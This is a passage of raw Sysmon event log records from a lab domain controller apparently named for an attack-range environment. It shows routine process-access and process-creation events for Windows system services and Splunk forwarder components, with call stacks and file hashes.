13:30:15.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012306Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012305Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:15.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012339Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:16.873{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012338Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:16.873{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012337Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:16.873{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012336Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:16.873{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000012335Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:16.435{08A6967A-4768-6000-2A05-000000009A01}63166320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012334Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:16.264{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4768-6000-2A05-000000009A01}6316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012333Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:16.264{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012332Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:16.264{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012331Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:16.264{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012330Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:16.264{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012329Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:16.264{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4768-6000-2A05-000000009A01}6316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012328Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:16.264{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4768-6000-2A05-000000009A01}6316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000012327Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:16.124{08A6967A-4768-6000-2A05-000000009A01}6316C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000012355Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:17.889{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4769-6000-2C05-000000009A01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012354Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:17.889{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012353Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:17.889{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012352Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:17.889{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012351Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:17.889{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4769-6000-2C05-000000009A01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000012350Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:17.889{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012349Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:17.889{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4769-6000-2C05-000000009A01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000012348Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:17.749{08A6967A-4769-6000-2C05-000000009A01}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000012347Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:17.076{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4768-6000-2B05-000000009A01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012346Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:17.076{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012345Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:17.076{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012344Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 